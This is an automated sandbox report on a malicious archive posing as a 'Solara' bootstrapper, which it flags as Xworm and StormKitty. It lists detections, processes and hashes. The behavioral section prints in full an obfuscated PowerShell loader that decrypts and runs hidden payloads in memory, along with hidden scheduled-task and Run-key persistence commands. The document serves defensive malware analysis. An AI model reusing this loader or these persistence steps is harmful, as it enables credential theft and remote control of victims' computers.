Analysis Overview
SHA256
e2f53b76060c0115efe12f3e6a8c2f0b27caed7a4d471b85d318b21de6cfe0c7
Threat Level: Known bad
The file SolaraB.rar was found to be: Known bad.
Malicious Activity Summary
StormKitty
Xworm
Detect Xworm Payload
StormKitty payload
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Themida packer
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Unsigned PE
Program crash
Enumerates physical storage devices
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Checks processor information in registry
Scheduled Task/Job: Scheduled Task
Suspicious use of SetWindowsHookEx
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-24 05:34
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-24 05:34
Reported
2024-06-24 05:39
Platform
win7-20240508-en
Max time kernel
59s
Max time network
188s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\SolaraB\SolaraBootstrapper.exe |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\SolaraB\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB\SolaraBootstrapper.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6a69758,0x7fef6a69768,0x7fef6a69778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2208 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2216 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1120 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1368 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3272 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 988
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3300 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3024 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=2212 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=1940 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3368 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2512 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.4.4:53 | google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.4.4:53 | google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
Files
memory/2132-0-0x000000007448E000-0x000000007448F000-memory.dmp
memory/2132-1-0x0000000000C90000-0x0000000000C9A000-memory.dmp
memory/2132-2-0x0000000074480000-0x0000000074B6E000-memory.dmp
\??\pipe\crashpad_2608_URRGWQCIJBUMSMBN
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
memory/2132-61-0x000000007448E000-0x000000007448F000-memory.dmp
memory/2132-62-0x0000000074480000-0x0000000074B6E000-memory.dmp
memory/2132-86-0x0000000074480000-0x0000000074B6E000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | e407234e1b3e383f63bb367cb007fa5d |
| SHA1 | 00beabd6244f70fa93f35520fe4c0aca10aa3dbd |
| SHA256 | b9eba90adde924c8dce531dfee494b065332170246e1cc6e5e6657ad77a12c01 |
| SHA512 | 9fb38d4ba0f7bb5e00f509cc48ce62b550bbf3da2e89089f4758233318a86f10f5e5a8a2401638136c0cfbfa89d631a358f157339d3114f68a8bb17cab89520f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 58dc860c4be36ea6248f0dfb613e8370 |
| SHA1 | f03664d672cb2d0acadecb74df5dcea2c5b63f11 |
| SHA256 | 146942b6c23bac1d61006f71933678bdf54ede4e046fab8048d450bcde655bad |
| SHA512 | 96485bd826433e31f5ad5b1d21325ece23870739ba74bbdd3a4ae2858234fed87b22e4592d5875966e4ac5c3402c72391d2d37a17f04e201de9472b550742ccb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 5c7e46f7048220c813d9a799cb61fa43 |
| SHA1 | 49cb8fc1aea1fb5221f73b8ca012515e33432600 |
| SHA256 | 4e17845af6aad5fa3574ac39de59b21d2e2526c560e9c9e764b5aa56922fad2e |
| SHA512 | 8cdcca4bc32ebc132b96556ef7321d333ff55fe9eb3b60d407e30926a814d3825a0351a8512c63f1c1a3c2a6bbe01a069e0e55a6c5fdd4ac0db1db464003d606 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-24 05:34
Reported
2024-06-24 05:39
Platform
win10v2004-20240226-en
Max time kernel
142s
Max time network
235s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB\SolaraBootstrapper.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\XClient.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\SolaraB\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB\SolaraBootstrapper.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Solara\Solara_Protect.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQhMtkbsVgtPIj+9hlMIsCH2Pou/2Q6I1Z8AAFEZJho='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ptE5ELI448W/24fFf9TlYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KxrKd=New-Object System.IO.MemoryStream(,$param_var); $GIOzm=New-Object System.IO.MemoryStream; $hKjjR=New-Object System.IO.Compression.GZipStream($KxrKd, [IO.Compression.CompressionMode]::Decompress); $hKjjR.CopyTo($GIOzm); $hKjjR.Dispose(); $KxrKd.Dispose(); $GIOzm.Dispose(); $GIOzm.ToArray();}function execute_function($param_var,$param2_var){ $ZWVgR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EybCe=$ZWVgR.EntryPoint; $EybCe.Invoke($null, $param2_var);}$RvTul = 'C:\Users\Admin\AppData\Local\Solara\Solara_Protect.bat';$host.UI.RawUI.WindowTitle = $RvTul;$KBDbz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($RvTul).Split([Environment]::NewLine);foreach ($OSADB in $KBDbz) { if ($OSADB.StartsWith(':: ')) { $uOIYZ=$OSADB.Substring(3); break; }}$payloads_var=[string[]]$uOIYZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.0.76890781\209718544" -parentBuildID 20221007134813 -prefsHandle 1812 -prefMapHandle 1804 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f8539d5f-bf0e-4597-bf7c-d082a9a6e20f} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 1904 1e7853f8b58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.1.521831789\1806776855" -parentBuildID 20221007134813 -prefsHandle 2316 -prefMapHandle 2312 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {993fbfea-4096-4a36-ae1b-b92e5e6254a4} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 2344 1e7852f0a58 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.2.179795202\897035016" -childID 1 -isForBrowser -prefsHandle 3056 -prefMapHandle 2952 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80d1f89b-3fd6-4cbe-b982-039a359988b8} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 3208 1e7895c5f58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.3.1866736029\1043454601" -childID 2 -isForBrowser -prefsHandle 3588 -prefMapHandle 3584 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {adb4d41e-da09-49c1-814a-8dac9250351e} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 3600 1e7f185f558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.4.191300101\788793555" -childID 3 -isForBrowser -prefsHandle 4532 -prefMapHandle 4648 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {39092794-236a-474e-9a59-ccbcf7ae6f29} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 4656 1e78b2a9758 tab
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_469_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_469.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.5.606891755\296892075" -childID 4 -isForBrowser -prefsHandle 5072 -prefMapHandle 5052 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {baaa3045-3e25-4242-bda9-29c1dd1edfc1} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 5068 1e78bbb6958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.6.1038430401\797689001" -childID 5 -isForBrowser -prefsHandle 5208 -prefMapHandle 5212 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {14b840a9-3594-4c9e-ae0d-5e194c594c4c} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 5200 1e78bbb5158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.7.725132788\1837089629" -childID 6 -isForBrowser -prefsHandle 5396 -prefMapHandle 5400 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5603c1c0-600a-4945-8a4b-7863c8b1ae7d} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 5388 1e78bbb5458 tab
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3700 --field-trial-handle=2272,i,4858140932023865871,5726683989663339295,262144 --variations-seed-version /prefetch:8
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.8.418852028\1251578625" -childID 7 -isForBrowser -prefsHandle 5072 -prefMapHandle 5232 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {14569905-487d-4b11-916e-16e85afa5ad7} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 5964 1e789524e58 tab
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_469.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_469.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQhMtkbsVgtPIj+9hlMIsCH2Pou/2Q6I1Z8AAFEZJho='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ptE5ELI448W/24fFf9TlYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KxrKd=New-Object System.IO.MemoryStream(,$param_var); $GIOzm=New-Object System.IO.MemoryStream; $hKjjR=New-Object System.IO.Compression.GZipStream($KxrKd, [IO.Compression.CompressionMode]::Decompress); $hKjjR.CopyTo($GIOzm); $hKjjR.Dispose(); $KxrKd.Dispose(); $GIOzm.Dispose(); $GIOzm.ToArray();}function execute_function($param_var,$param2_var){ $ZWVgR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EybCe=$ZWVgR.EntryPoint; $EybCe.Invoke($null, $param2_var);}$RvTul = 'C:\Users\Admin\AppData\Roaming\startup_str_469.bat';$host.UI.RawUI.WindowTitle = $RvTul;$KBDbz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($RvTul).Split([Environment]::NewLine);foreach ($OSADB in $KBDbz) { if ($OSADB.StartsWith(':: ')) { $uOIYZ=$OSADB.Substring(3); break; }}$payloads_var=[string[]]$uOIYZ.Split('\');$payload1_var=decompress_function 